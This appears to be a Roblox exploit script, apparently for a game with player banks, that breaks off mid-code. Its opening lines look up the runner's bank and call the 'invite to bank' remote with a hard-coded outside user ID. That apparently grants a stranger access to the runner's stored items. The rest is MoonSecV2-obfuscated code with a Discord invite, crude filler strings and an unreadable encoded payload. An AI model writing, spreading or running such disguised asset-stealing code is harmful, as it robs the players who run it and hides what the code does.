local lib = require(game.ReplicatedStorage:WaitForChild('Framework'):WaitForChild('Library'))

local mybanks = lib.Network.Invoke("get my banks")
local BankID = mybanks[1]['BUID']

local args = {
    [1] = {
        [1] = BankID,
        [2] = 2750637955
    }
}

workspace.__THINGS.__REMOTES:FindFirstChild("invite to bank"):InvokeServer(unpack(args))

_, Protected_by_MoonSecV2, Discord = 'discord.gg/gQEH2uZxUk'


,nil,nil;(function() _msec=(function(e,_,n)local Y=_[(232-0xa4)];local W=n[e[(33228/0x34)]][e[(-#'test123'+(0x125c0/100))]];local k=(0x5a-86)/((0x34a-((1035-0x222)+-#"Little kids"))/182)local i=((0xc+(-0x1b-49))+66)-(0x5b/91)local M=n[e[(0x17a-223)]][e[(-#[[free trojan]]+(626-0x171))]];local v=(82-((209+((-0x3a64/148)+-#[[I like gargling cum]]))+-#'test 123'))+(-#"I like gargling cum"+(-0x2b+64))local s=n[e[(-0x2d+625)]][e[(815+-#{{};16,1,(function()return{','}end)()})]]local l=(126-0x7c)-(-#'me big peepee'+(((-124+(0x94-116))+-#"This is working now")+125))local x=(0x7b-(-#'me big peepee'+((0xe93a-(-#{",";78,'nil',{},(function()return{','}end)()}+29919))/224)))local u=((-#{80;(function()return#{('OOPbKm'):find("\80")}>0 and 1 or 0 end),10;10;10}+42)-0x22)local h=(((-#[[amena jumping]]+(-7956/(-#{1;{},50}+237)))+0x88)-0x56)local p=(((255+((75-0x63)+-0x5c))+-#"test")/45)local w=(10+-#{1;{};1,1,18;18;","})local f=(-#{",",'}';(function()return{','}end)(),",",112;(function()return{','}end)()}+9)local r=(9+-#{35,'}';(function()return{','}end)();35;1;",",{}})local t=((-#[[test 123]]+(-7742/(-0x30+(394-0xf8))))+89)local g=((((89+(-#'test'+(-0x46f5/173)))+-#"test 123")-0x6)+0x24)local b=(-#"big hard cock"+(0x2c1/((((0x3e1c-7989)-0xf97)+-#"I like gargling cum")/0x53)))local c=((((((-#{137,137,137;",",1;137}+338)+-0x68)+-0x45)+-#[[amena jumping]])-133)+-#"Little kids")local m=(((0x87-((-#"test123"+(0x1d+-87))+173))+-#[[amena jumping]])/0x7)local F=(-#'free trojan'+((-82+(0x783c/(177+-#{(function()return#{('FoHbbH'):find("\72")}>0 and 1 or 0 end);197,1,(function()return#{('FoHbbH'):find("\72")}>0 and 1 or 0 end);(function()return#{('FoHbbH'):find("\72")}>0 and 1 or 0 end);{}})))+-83))local L=(-#{{},(function()return{','}end)();'nil';'}';(function()return#{('ohbBLl'):find("\98")}>0 and 1 or 0 end),{};","}+11)local j=(46+(-#'amena jumping'+(-115+((-35+0x117)-0x9e))))local T=(-#{(function()return{','}end)(),(function()return{','}end)(),'nil',",",86,","}+10)local B=((0x29-((-#'I like gargling cum'+(((3542/0xe)+-#"This is working now")+-45))-0x89))+-#"test")local H=(388/(219-(129+-#{{};140,'nil';(function()return{','}end)();",",43;140})))local Q=e[(0x32ff4/156)];local J=n[e[((0x3a68/(-#"Little kids"+(21900/0xdb)))+-#[[amena jumping]])]][e[(83694/0xae)]];local q=n[(function(e)return type(e):sub(1,1)..'\101\116'end)('%..;$#}%')..'\109\101'..('\116\97'or'=}&.&!_/')..e[(((-110+0x1d762)/0xcc)+-#'free trojan')]];local S=n[e[(-#"187 ist die gang"+(1305-0x2c5))]][e[(973+-#{1,'}';1;1,(function()return{','}end)()})]];local E=(-#{(function()return{','}end)();{};'}',78,150}+7)-(((-13325/0xcd)+0x1dd)/206)local V=(-#[[187 ist die gang]]+(((-#[[no thanks]]+(0x3ab8-7570))-3745)/206))-(0x44-66)local K=n[e[(-#'187 ist die gang'+(374-0xcb))]][e[((0x2d4-395)+-#'This is working now')]];local d=function(e,n)return e..n end local O=(59-0x37)*(-0x76+((426+-0x3a)-246))local G=n[e[(-#"amena jumping"+(0x4cd+((-3193/0x67)+-#"no thanks")))]];local a=(44-0x2a)*((((-0x5d-(47+-0x3a))+-#'187 ist die gang')+0xf5)+-#[[This is working now]])local y=(0x831-1073)*(((-0x50+(45675/0xe1))+-#'big hard cock')-108)local C=((((-#"187 ist die gang"+(-0x77+(-#'I like gargling cum'+(-0x37dc+7109))))/0x41)+0xb0)+-#[[Little kids]])local N=(-#"free trojan"+(-0x3b+((-#[[me big peepee]]+(-0x4c+314))-0x99)))*(-#'This is working now'+(1848/0x58))local I=n[e[((-#"test123"+(13437340/0xa4))/0x4d)]]or n[e[(0x293+-79)]][e[((-#"test123"+(13437340/0xa4))/0x4d)]];local o=(58880/(-64+(616-0x142)))local e=n[e[(-#'I like gargling cum'+(232227/0xb7))]];local P=(function(o)local a,_=1,0x10 local n={j={},v={}}local d=-l local e=_+i while true do n[o:sub(e,(function()e=a+e return e-i end)())]=(function()d=d+l return d end)()if d==(O-l)then d=""_=E break end end local d=#o while e<d+i do n.v[_]=o:sub(e,(function()e=a+e return e-i end)())_=_+l if _%k==E then _=V S(n.j,(K((n[n.v[V]]*O)+n[n.v[l]])))end end return s(n.j)end)("..:::MoonSec::..!*%&/+^,;.:_#$}=+::,;#,*!.&=%!!+}:*:%^!,}:^^+!%$*%=,%=%/*;=!$}.#:=;;+=}##}_&.;#_#,_}$=*;=^$_#!}$=}}&#/;!;&,,._$^_%.,,#_*_%;#;.+:/#!^*.=%#.+=&;*$!%+,&.!_!&$!_&._.$,/++//!.%:;#^$+%&,^/^^/,%=^&.=,:+=//,};*+;/:%_!&=/$*;_+^*}!:}+#::=$=}%#*:},;,.+&+!%**&}*,*+!&+*:/=+!%:%,=;}:;#/.%,!#=*/;%!**=:$&#*..=;!/}&#;:$}/$##._!.:,!/_$__:.=;/_^_&:,;!^#/^%%_%.*,^+_;&.*,&+//%%$#$;:^;/$&%^,^;/%&=*!!%};&./;%/!.}}&:*.!:},$:_*.=;.^!.&&$::;=,/#*_%.,,;^!!#}^#_}+#=_}.&;/^#/&=%!#=$}!;,.}.%,!*_/;*_=$};$/_..:;,%;*,=/$}#%:%;:,&+;&=*#!^},#:_;.+,}^^//%,%/!^*:=+$...;!+./.&:%.*}=*$^#=:$:*+#^+&$!+}:#!}/#!:!.;,^/;/*}+$##=$*:=+#/:^:%$&^*+!/$#:^.:.&,#%}%,}:$}#%_!:+,_,,^*/#%#*&=_:*#!;&,,/#&:%%_/:*,_^!/+,^,}+,&:%:=&=/#}#_.#;}&!}:#__!.+}}#;_*;}&$=}$;_$:%=&$*_%.:;!,%+;&}*!!;}#;$/^%;!$=%/+%**;;.^$+!&+*:^}+,+!_;.&,;+$:_.:,;+//%%:*&=:$#_/&,%*=}}&#;=$=;=*#$.&;#^!^^$;#%.=;/^..!:%,#,^%./!*}!!:+^^/!%+!:+&&.%#!*=+$*_$:^;!^_/=%*_^.!,++:;%;$,$+,/$*$!_=+#=_+:*,*!/}!#+::}^$+#+:..^,;+%&,*_#_;+^^/_&!+;+_+%%#!/.+,&+;&$^+,!^!&:&!!!}}^;+!%=*/=.+*%_!.=*}*#}&=%;!^}_$!=$!}=&$/.!.&;,$,},#%:,;#_;__:=,&^:+#/+*$=#}&}:+!%$*%=,%/&+*:=_#!#/:$.&}&}_#}_&.;:,;#:%%=**=^$_!*=+$&,%+;&.*}!&/=%}*==#$,^#/^%_*!/*/.%%!+=+_}_=...^^,+.+&_^.^,_^!;;.%,/^,/$,*:$;;^$+%;:.*,&/#%#*&=:#*$/:$_!*$=&$;_$}&}_$!.^:#;!^}+.*%*!!%$$#::;.:./=^$,_#:*#;$:_/:},+!_}/#.:}!&$$_=:+;^,*^.&_*}*+=.#=,}&_*.=}}&%_*#!!}_#*:=.:_}=,$+_:.=}:$__$:!^://%/#:__.*,^+_:/.;,!!=&$%#_}}_#._=.=;&^*+/&.&%.,,++:&=;#,$^%/&=%##_*}}+/&**^=_&&%:*;!&$$#,:&;=^&=^$%_,.#$/$=_..*;+^$//}/!*.*,,+;&$%%+:+_&=*,%&;!^+/::=;:.&&:!/;,.%,%+,&#,^/:+/&$},%*;;^//.%}++^,/*&_}$=_}&_.:!==*!}:#=_/}##$_*;.;#+}/^*$!+}_#==,+.&:*=!/&*&&*/=#!/^#/,%#**&#//&%!:$$$/#^:=;&,+/&$%_%.,,#:}_+..,+^}&+#$:/;.^}:*.$./,^+^&:%/!+}*$/;=,$+}/%^!#,:&;;^$.+.=,$,&/,%}%/=:}#}^/#%.!}=&%_%%*^$:#=#!:;;!!&=/#::=./#&:;.^.;,.^*/!&!!!$%_:.*,.+=/&*&$^:}.&,;_}_%.!&_^;&_*$!;=/$._::,/;;+};#;:$.%}!#.:%;$,!,,$._:.=;/$__,.^;!%#}^#,:#.*$$_#:$;:&.=&$/_..}$*#._:.,*:!,}*#^:_$_#,:;;_;&++&$*/=#}%#^*:+/&**^=_%.&&*$!&$+#,:*;;^&=^$%_,.#}/#}:#:%,^+$+&%.*_/*,_+;&$%%%,^&&:%:!&:!;=,/!}*$=.$}#&}:=#$^$!;%.!,;/}&+}/.},=^//.,;;^^,/_*$:};#,*+^.*;+^;+}&}%^##$.^=/;%$*%/_/}%:!$=%$+#,,=.+^.+,/%&:.=,$^%/,^=;!^;/!!,*:=&%%+}&.*}!&%=&%%^}:}*$&_#./,&+:;$#%:/;.^}.;;_^$&*=+##_*.^}%#*_%;=;%+./,&*!;_,$+#^:_;#&!=+#__!.+#%$/:_;}%}/^&.%_*^};;#:*.,.%,&};*&:=./,.#^_,.#,$%#!^}_*;=$}%,}:,;.^*+!&;%^#*$_##:=+^^!+./_%;!%=;...!::,:,%//&:$_=&}:#/_.^+;&%$!^}=#=::}%;_^//$%$!;!$*_!&}&_#_/^%+:+$&_$=*&=^#$_=:!,;^./^!&&%.^,++:&=;.,^+!&;*#*!&+^=/#&**^/+%:*;*:=_}&#%_%!%!$}$$%_,}}}:#$_&:/*;=$$=#/:.!&}+#/*#%}!,}#$*==!.=^$/_+./^,+}+!&.!$==:*+:&#%*!^&,&+*#=+;+^//.%}+/^+/#&,*+!!,/+.&_%!!+/_&=*$.#;^^&/;%$+:^#/.%%*/=:$._.^.%/!/}.#}=.!,}=#+:#!_&#=^$_#!#=_/;=.._*;&^^+$/**,=_.#_:_+:!;%*+%%&/!_}};}:^..;_,^/;}#!*=,=%$&^+,$,%^^/%%}*,:.;$,#^*#=!^}^#__!=;}.#__&._#*!+$;_$:%=!$=_!:.;/,%/$&=%*!;$;#*:=.,;!^,/.%*:/.%^_+!&+;%,&+;&.!$!+$$#}_,;#,=^+;.#=:!;+^:_,:;;$^}*$=,$#=&},#+^=;=,_+.&_&&#$=&$__+;}%*=$}%#,=.=%$$#.:...,=+&&..;:,;&^;/$;.;^^}/#&.*_=*$;_==%&+!.}}$&!:!%=%$&_+./,,^=/+%.=$!&}&#_.=;:^$##$^_,.#;*$:#/:!,:;*}.#/:.;}$%_,_!;,^:^*/&*_!!=*^;+}%=*/=.&*%;*#$$}/#!:.;%,;^/%!*^!#=&:,;=:!,/^+/%,+:=;#,*+^.$;.,.*;&*%#!;=!.%+;%$*%=,&$&**^=,$._;._.&^$+;&#}%!%=!$*_+_&*:=^$_#!*#}=$*_#:;;$^}&***_+._,#^*/^.%,*^%&=}}:,;.^}+&;$;=^}/%$!_*.^,_:;::;_,&=,}&_}:&;;_,:+;^^:/^+/%}*==.$=;}/}%.!}=&%%&!**=+_!_^..;:^//::.__./,.+};/;#,*&,/=&!*&},:}_*:;;%$}}=#.:}.&:$,$_}/,+.+^/.%}!*}##=,}&_*.=}}&*_*^!/$=$*_&.:!}=_$+_:.==,#}_*:;;:^%/*&&*_=%$:}%+*%+!:}=%^*}!}}=$*_!.&;_^*/+*.*===},__:^;.};=+$&_;.$#:##:$.+,_^$+&=/_+;=,/+.:*;_^$+!&$*:=$}$$%_!:%,!=}$=#/:.$:$;_}_*,$*!}#$*_^}*=%#^_,./;_^;+!%}+_./,%+,&#.&^_+#/+*:!$=&^,/$%}*&=;%$%&*.!!%/^%&_%!!+/$&}%%!$}&$*_#+:;^,!/#%^;+.!,!++&:^,,&+,&&%#/_;;^%/,%#+$+_&#%/!:=#$*#&.:.!^,}_$+_%.,,#$+_+..;+^%&#%/*^&#,%+&&;*$+%&^*=!+#+;&^!/+%:+%++/+%:!+}.$!_$_}%*!*}^#_=&!*}.$^_%;/*.=&$;_$}&}_$._::/^$^++%&.%&=.%#^^/&%;!$&:/_&!**$^$:#&:./.!;}/#.:}!:},#=:$.:,#+%&.%!,=;$^:/=&/;$^$+^&#*==_}+#&%!&}!_=!$+%:!!=,$$_&.+;*^_*!%:*_=}:+#$:*.#&.^/*=}#$+#.$%.%;$%,=#}*#^=&!+}%__:$.&,%+%%+%,!#=^_,:$:&;::}},#+::;=$;#%_*;^,,+=&^.^.=;*^^/_:&;}^;.%##:.;},&.::#;^;!&&/:%;!:!,^_/:%=*//^/$&**&=%}_;^/%%*!^}_/;%+=$}!$!_+&**/=;$$#%!^*&;^+^&_%!+!+&&&$/*!},$,_!/$;++=/+&+#^=!};#+:^;}^$+$:$_;.;,$^%__.+;+^%/!*_:$;:^=+/;*,=,,/_&+=,=}}&*/,%%_*!=+%%&/!_}};}:^..;_,^/;}#!*=,=%$&^+,%,!^;&#%^!;=:;$+#;/,$^+/_}_=%!}.::&!^##^/&#%/}!$+__:!;:^+%%!!}+#:=#!&$$$&:=;$;!/$$:_#:*;^_%_+:.#$!/}/#.:}}^$_##_/;#_==$$^__:!$+$#_}:;;;+*+!%.%!=:$##}//%:!_=!$+%:!!=^$$+*&}*;=$}%!=%!!+}^:}:+.,;!+;&,*}=..;^;/$&%,_^++/%.*:!%$.;;:^;_&;++%/=$}+_/$#:^:.^_^^}&#}::;=,/$!.=;=,&^!/%*#!*}+#*+^&!*+=:%;&/#.#=$,#::%.+,:%^=*++._;!^+/#,/*/=.$}#+:;;$,%^.,$%*!^}_&/_+.:,=^//.%}*&=;$$#%:,;#,*+^&_%*!+}:#=_/...!^&/;%}*%=$$##*:^.$,!++&_*=;=}.#}_&_},$^%/;%#*:=^$##!&_;:,&+/&.*}!&=*#$_&.,;!^*/^%_*!==$:#!:/;.;&+&&;*$!&},##_*.;#!^!/^%:*!=/$._}_+$=^$+&&,&/!*}^#_#%}^,:^!//;^!}=&$;#&!^;,^$+*/;*_!*}+#::=.;,.+}/&%;*==%$;_#_&_/^_+*&+;:==}/#._/:^,;+}/%^&!#=%$^_#:!;.^:/=&/*.&:}&#.:$:/#;+#/%%^&^=!$+_::+};^./=&&&!=$}&#,:#.*,:+_/!%+!:!,$/_:.}.+.^/$&&*,;=}*#^:_.^;;+:/!%//+}}$/_;.};%^_/#&**^=_*##+:_;=;^::&}%/!;,/$%_,.#;,#:/_&**+*.$=#+:.;},&+#&$%%!,}#=!_^.#;!,,,;%=*+=.!=#&:;;$,;__&#%%!^!:$!_^.:,=^//$%}*&=;$$}*:,;$,*+:&_%!!+}:!__/.:,},+..%$*&=,/$#*:^;_,^^;&:%!!/!##}_/.;,}^%/_%#**=^$_}&:+;_^=+;&.*}!&};=&_%.;,#,&,/%_**=+!:_=:/;.,/^^&;*}!%%&##_%.^,#^!/.%:!==/$.=::&;.^$^/;;*#!%}^!}_!.+,:^++,%.!==&!%_$:&;,^$+*&:*_!!}+#:$../,:+}/,%;!$=%$,}::*;,^_^%^&*:!!}/#::}.&,;^&:^%,!$=*!/__:*;+^:/=&;*.=}}&#;$_.%,;+#/+%^!_=!$+=^.=;+^.^!;/*;=}}%=$:#.*,^^*+&%+!_}=!^_..=;&^./$&^*,=#}*#^$$.!,^+:/&%/!.}}$&}$.$;&^,+}+=*^=#}!=,::;=,/+=+*%&!.}$!}_,.$;*^,/_&/*+=:$=#/}+;},/+;/=,&!,}$$*=&._;!^++!.&*/=:$}=}:;;},%+,&#%+!^}_$!_+$+,=^+/./!/*=;$}#%=.;#,*+^/*&&!+}_#==!..,=^&/.%$*^=,$##*:^#,,!+^&:&*&%}.#=_&%/,$^%/,&}&==^$$#!_^;:^=+/&.%;!&}_#$_%.,,}^*+;%_*!=.$:}/:/;.^},&&;*$!^},$!_*:+,_;!/+%:*&=/$$_}#.;;;$+%&,%!!*}:#_=%.+;#+=//%}!}/}$;_$:%;,^#+*&:*_!/}+#=:=:/,.+}/^%;&.=%$__#:*;^^_+/&+*_==}/#.:}.&,;^%/%%,!#=^$^#$#};+,!/=##*.=}}&$:$^.%,}+#^^%^!_=!=+_:.=;_^.++&&*#=$=/#,:#.:,^_:/!%+!:}=$/_.:+;&,*/$&/*,=#}*#^_*.!,_+:/^%/*.}}$&_$.$!=^,+%&*%;=_}!#_::.,,/+.&}&+!;}$$._,#*;*^^/_+!*+=:}^#/_!;};%+;+$%%!,=&$*_$._:^^+^:,,*/!!$}#::;#=,%^.,=%*!}}_*^_+.:,=^//.%}*#=;$}#%:,;#;&+^&_%:!+!$#=_/..,}^&/;&&*%=$$##_:^._,!++&=*=*}}.$/_&#;,$^%/#%#,/=^*_#!_,;:^=+:&..:!&};#$#/.,,#^;/^+}*!=+$:_=:/;.,/+&&:*$!/},$#_*.^;!^!:*%:*+=/$.$_:&;}^$+%&,*$!*=;!__!.#,::=//%.!}!+$;_$::;,}=+*&^*_*%}+#:_;./.}+}/&%;%$=%$,#+:*;=^_,*&+%#==}/$/:}:%,;+$/%%,!#=*$=__:_;+^#/=+/*.=}}##;_^.%.$+#^*%^!_=.$+#&.=#^^./}&&*;!+}%#.:#.&,^+_/!%+**}=$__.:^;&,;.$&%*$=#&+#^_%.!;+::&=%.!.%$$&_}.$;%.}/#&+*^!!}!#^::.=#/+./*%&+.}$$^_,:}:^^^/=&!&:=:$=#/#.;},&+#&$%^!,!$$*#;._;!^_/:#/*/=.$}#&:;;$,^+,/%%*!;}_=!_+.:;&^//$%},==;$$#%:,.%,*+.&_%!!+}:#=_/.$,}^./;%=*%=,$##*:_;_,!++&_*=&/}.#}_;.;=^^%:}%#%&=^$_#^:+};^=+/&.%/^,};$&_%*!,#^%/^%_*!=.$:_=:/;.},+&&.*$!^},##_*.^=#^!/^%:%*/+$.#/:&==^$+%&,%%*/}^$*_!*^,:^!//%:!}=,$;_$:%;,}$+*&,*_*%&^#:_+./._+}/&%;*&!+$,#%:*!,^_+*&+*_==};#.:}.&,;$}/%%;!#!&%,__:^;+=*/=&/*.*}%_#;_&.%,$+#_;%^*$/,$+#!.==_^./}&&*;&=}%#$:#.*,^+=/!&+!:}=$:_.!;;&^:/$/%*,=#},#^$+.!,.+:^=%/!.=/$&#+.$==^,+#&**^!*}!&;::./,/^_&}%&!=}$/._,.#;*^^/_&!*$=:}+#/:.;},&+;&$%.!,}}$*_,._.%^+/:&^*/!/$}#&:;.=,%+,//%*%_}_$!_+_:;&^/+*%}*_=;=}#%_.:^,*^!&_.%!+}:#=_/..,}^_/;&,*%=.$#}*:^;_,;++/%*=,:}.}}_&.;;+^%/=%#:*=^=_#!:+.%^=+#&.%#!&!;#$_%.=,#^./^.:*!=+$:_=:_;.,!+&&:*$%%},##_;.^;%^!/;%:%*=/$.#^:&*,^$+%&,*#!*}^$%_!.,,:^*//%=,%=&$=_$&_;,^$+*&^*_!/}+#::=./*%+}//%;!=&,$,#&:*;^^_+!&+%#&.}/$!:}%*,;+$/%&.!#=*$$__%};+^:/=/^*.=}}_#;=#.%,,+#/*%^!_=,$+_#.=;+^./}&&*;=$}%#;:#.*,^+}/!%+!:*&$/_..};^,./$&%*,/}/^&^*,=.$;___&;.^$/*/,%,!=}&#}_**!*#=_}!#+*}!;}/_}:$;.__=;$%_,.##;#__=,&,$^&/_%;*_=&}*+_/*%%!,}#*^*$!%=&^;/$%=*/=.%,&^}..!,,+,&#%*,^/#&.%,!$&&^/%.%$_/;#=,%=}.^_,/+^&_%!,:+&&&^,::,}^&/;,%,.+}=#&!!#:__$_^:;.;%/&!&,*.!#=!/*/=%#**=^/=%=*;=}}*_$:,;+&%}##$_%.,###^_:.}*/=+$:_=:/;.^}/&,,%!!+},##_*==$=$//;%#!==/$.%,!,&_,&+%&,*#,&/,/%*,=:}};}/_%.!}=&%,%$!,=+_*_;.$#}!,}+#::=!^$}#=_;.*,=+,$:#!:*;^^__,.^;,^/^_#}:}.&,;#*_/.^,#^/$._=:!;+^:.^.+;^^&&}$,:$.%,,:/_^;$,!*!%;*_!$=;#:^};&,.,/++=^_&.*,^+_.!.,^=^%/;%;!#;/^;,#&/*,=#}*=#}/_=,;+:&=%/%.*_=&&=.};%^,/#.^#.=$}!#+::=$$=+#&=%&!;}$/+*%:;;*^^/_,$;/+}+/&!!}}*$^#::^.%,_/,$^_^._;!$.:_.*;!+}&:#&:;;$,%+,&#%*/^/^$}_+.:,=:_:}:%+,+$+!%+!#=:$+_,:../,;}$$:_/..,}#,_*:!;%^&&$&:=/}#$$_:.+%/!/}.#}*:=$=*#.::!_*^=^$_#!*;=:$__$:$,.!.};#$_%!:=!$&:=..,,^/$:_=:/;.$/+&&.*$!%},##_*:;,_^!/,%:*+=/$._}_+;;^$++&,%}!*}^#_$!.+,:^%//%#!}=/$;$$:%;,^=+*&.*_*/}+}::=./,#+}/^%;*;=%=,_#:*;.^_+&&+*$==}/#.:}.^,;^*/%%,!#=*$^__:%;+^:/=&;*.!%}&#;:$.%./+#/%%^*$/*$+#*.=:;^./}&&&;&.}%#}:#.;,^,}/!&,!:}=$#_.:;;&^;/$&%*,=#}:#^_*.!,++:&=%/!.=^$&_:.$;/^,+}&**^!/}!$}::;=,/+.&}%&!=}$$__,.};*;^/_&!*#=:}^#/#;;},._=&$%.!,!*$*_,._;*^+/}%=*/=.$}$;:;;},%+_&#%*!^}_}$_+._,=,^.:%}*:=;!*#%:,;#.*.%&_%,!+=*#=$,...!^&/;&+*%!*$##*:^;_,!++/&*=!:}.#}_&.;,$^%/=%#*&=^$$#!_,;:^=+$&.&,!&};#$_%.,,#^;/^&/*!=,$:$=:/;.^=+&&=*$!}},$%_:.^,$^!/=%:*!=/$__}:,;;^$+%&,%^!*},#__!_%,:^*//%:!}=&$;_$$=;,^=+*&^*_!^}+=::=./,#+}+}%;%&=%!,_#:*;.^_+$&+&%==*/#.:}.^,;,,/%&}!#%*$^__:&;+,%/=/#*.%}}&#;_!.%.&+#/;%^*_=!$+_$.=.%^./=&&*;=$}%#.:#./,^+#/!%++,}=$,_.:*;&^;/$//^^=#}+#^_*.!,++:+*%/!.=&$&#:.$;%^,^#&**^!!}!#:::.!,/,.&}%&!$}$$,_,_!;*;^/_&!*:=:}/#/:$;}.&+;&$%,!,=*$*$^._;!^+/:&/*/==$}#&:;;$,%+,/!%*!^}_$^_+.},=^//.%}^&=;$}#%#,.!,*+=&_%;!+}=#=#^#,,}^}/;/:*%=,$##*=:;_,.++/+*=!^}.$/*,.;;^^%.,%#*%=^$_#!:.;:^=+/&.^}!&}.#$#/};,#^:/^%$*!=+$:$*=#;.,;+&/.*$!%},##_*.^;^^!/$%:!==/$._}:&.%^$+/&,*}!*!^#__!.=,:^.//&#!}=&$;_$:_;,^}+*&;*_%^}+#:_;./#.+}//%;%_=%$__#:*;^^_:!&+*_===^*::}.#,;^&/%%,!#!&=#__::;+,_/=&/*.=}}&#;_;.%,=+#/*%^!_=!$+#/.=;^^.+!&&&;=$}%$*:#._,^^}/!%+!:}=$$_.:!;&,&/$&^*,=#}*#^=..!,^+:+=^#!.=#$&#+.$;}^,+%.;*^!.}!!=::.!,/+:&}%,!;}$$%_,}^;*^,/_&/*+=:$=#/=,;},/+;/=,&!,=:$*#,._;!^+/:&/*/!;$}#_:;;$,%+,+,%**/}_$%_+.#,=;/.*%}*^=;}_#%#;;#,,+=&_%.!+&!#=_+..;!^&/#%$*%=,$#!,:^;#,!+_/&*=!;}.!!_&..,$^//,&!**=^$_#!$,;:,!+/+=;^!&};#$!,.,,$^*+_%_*/=+$:_=:/$}^}+/&;%*!%},##_*}#,_^*/+&#&$=/$#_}:#;;^$+%/.^$!*}:#__^.+,:+=+^,&!}=;$;$=:%;,^#+*&^*_!^}+#_:=./,.+}/&%;*%=%$$_#:*;^^_+!&+*}==}/#._/.&,#+$/%%,!#+$$^_#:!.,__/=&$*.!!}&#;:$.%,#+#/_%^*&=!$+_:.=.=^.+,&&*:=$}/#,$%#!,^^//!.*!:=!$/$,.};,^;/$&%*,^;}*#,:_:%#^+:/;%/*;}}$&_;.$;,^,+^&**}=_}!#+_#_$,/^/&}&&!;}$$%_,=!;*^=/_&_*+=#$=#:_#;},#+;:+%%!;}#$%_^.=;!^+/:%=,#=.$=#&:#;$,%+,&#;$!^}#$!$+}%,=^$/.&^*&!;$$#%:#;#,_+^&}%!!+}:#=_...;.^&/:%$*%=,$##=:^./,!^!&:%!!/}=$,_&.#,$_}/,%$**=;$_#/:+;:^=+/.+*}!/};#$#,.,,#^*/,%_*!=+$:_=:/;.^=+_&;*$!%}_##_*.^,_^!/+.:/=:,$$_}:&;;#=#_:_;*_/}##__!.+}$$&_^.%,#+:+=_$:%;,^#$;&.*_!!}+&$%/=^,#^%/&%;!$++&=*$*&^^^_+!&+*:==}/_.}$.^;/+$/%%,,#+}&!%;=+$;#!#%..,:^.%}}.:$.%,,^}.%%^!}=!$$_:.=;/^.;%&&*_=$}+#,:$.*,#_=/!%;!:=^$/_:.};&^;+*&%*,=#}*#$:_.*,+^#.!%/!#}}$__;.$;%^,;!&**.=_}&#+:_;=,/:/&}%^!;}=$%_,.#.&.//_&&*+!*$=#/:.:!$&+;/*%%!_}#$*_^:$;!^+/=%=*_=.$}#&:;;$,%+$&#%*!^}_$!#,.:,=^_/.&+*&=;$$#^:,;#,^+^+;%!!^}:#=_...;,^&/#%$*%=,}}==:^.+,!+;&:*=!/!.#}_&:%,$^#/,&%***^$_#!_!;:^=+/&}*}!&};#$_=.,;/^*/^%_*!=+$:#$:/.*^}+&&;*$!%},$,_*:/,_^%/+/:!==/}/_}:};;^=+%&,*#!*=*#__%.+,#+=//%.!}=}$;#;:%;:^#,*&^*_!_}+$+:=.+,.+}/&%;*,=%$._#:&;^^_+!&+*}==}$#._;.&,;+$/%&!!#=/$^_$:!:+^:/=&,*.!,}&#.:$.^;^+#/^%^*;=!$^_:_*$+^.+&&&%!=$}%#,:##.,^^!/!%^!:=&$/_.}.;&^#/$&/*,=#}*#^#!.!,++:/!%/!.}}$&_;.$;%^:/}&**^=_}/#+::;=,/+.&}%&!;,/$,_,.#;*$^:}.*;*^^=##/:.;};+;^&$%/!,}$$*_^._.%.&/:&%*/=:$}#&:;.=#&+,/!%*!;}_$!_+:!:*^//}%}*&=;$}#%:_;#,*,}&_%!!+}##=_/..,};_/;%$*%=,$##*:^;_.;++&:*=!,}.#}_&.;:+^%/,%#*%=^$_#!:+}^^=+;&.%!!&}.#$_;:,,#^*/^//*!=^$:#!:/;$^}+&&;*$*_},#$_*.#}%^!/+%:*$=/$:_}:/;;,*+%&,*#!*=/#__*.+,}+=//%.!}!#$;_}:%;$,#+*&,*_*.}+#_:=./,.^%/&%;!$=%=!_#:%;^^_;^&+*}==}^#._*.&,;.&/%%#!#=/$^_$:!;_$*/=&;*.*&}&#.:$.,,,^!/*%^!_=!}:_::!;/^$/}&&*;=$=_#,:$.*,^.*/!%.!:=*$/_#.};&.}/$&,*,==}*#;:_.^$#+:/&%/%&}}$/_;:%;%^_/#&**^=_=:#+:_;=,/:+&}%,!;}$$%_,.#;*_./_&/*+=_$=#/:.;}_}+;/*%%!.}#$*_^._.+^+/:%=*+=.$}#&:.;$,%+,&#%*!^}_$,_+.:,=^/+^%}*&=;$}#%:,;#,*+^&_%!!+}:#=_/..,}^&/;%$*%=,$##*:^;_,!++&:*=!,}.#}_&.;,$^%/,%#**=^$_#!:+;:^=+/&.%!!&};#$_%.,,#^*/^%#*!=+$:_=:/;.^}+&&:*$");local s=(0x5cd/55)local _=62 local n=l;local e={}e={[(43-((9911/0xbb)+-#[[Little kids]]))]=function()local l,d,e,i=M(P,n,n+v);n=n+N;_=(_+(s*N))%o;return(((i+_-(s)+a*(N*k))%a)*((k*y)^k))+(((e+_-(s*k)+a*(k^v))%o)*(a*o))+(((d+_-(s*v)+y)%o)*a)+((l+_-(s*N)+y)%o);end,[((0x3d-48)+-#'Little kids')]=function(e,e,e)local e=M(P,n,n);n=n+i;_=(_+(s))%o;return((e+_-(s)+y)%a);end,[(133-0x82)]=function()local e,d=M(P,n,n+k);_=(_+(s*k))%o;n=n+k;return(((d+_-(s)+a*(k*N))%a)*o)+((e+_-(s*k)+o*(k^v))%a);end,[((131+-0x6f)+-#[[187 ist die gang]])]=function(_,e,n)if n then local e=(_/k^(e-l))%k^((n-i)-(e-l)+i);return e-e%l;else local e=k^(e-i);return(_%(e+e)>=e)and l or V;end;end,[(0xe1/45)]=function()local n=e[(22/0x16)]();local _=e[(0x11/17)]();local r=l;local d=(e[(896/0xe0)](_,i,O+N)*(k^(O*k)))+n;local n=e[(((0x3a9ec/107)/0x84)+-#"amena jumping")](_,21,31);local e=((-l)^e[(104-0x64)](_,32));if(n==V)then if(d==E)then return e*V;else n=i;r=E;end;elseif(n==(a*(k^v))-i)then return(d==V)and(e*(i/E))or(e*(V/E));end;return W(e,n-((o*(N))-l))*(r+(d/(k^C)));end,[((104-0x57)+-#"Little kids")]=function(d,r,r)local r;if(not d)then d=e[(-#'Bong'+(1080/0xd8))]();if(d==V)then return'';end;end;r=J(P,n,n+d-l);n=n+d;local e=''for n=i,#r do e=Q(e,K((M(J(r,n,n))+_)%o))_=(_+s)%a end return e;end}local function V(...)return{...},G('#',...)end local function P()local r={};local x={};local n={};local t={r,x,nil,n};local _={}local s=(-33+0x4e)local n={[(-0x73+116)]=(function(n)return not(#n==e[(-#"test123"+(47+-0x26))]())end),[(-#"test123"+(0x8c4/204))]=(function(n)return e[(0x343/(34402/0xce))]()end),[((0x94+(-#'Little kids'+(-0xb1+62)))+-#"I like gargling cum")]=(function(n)return 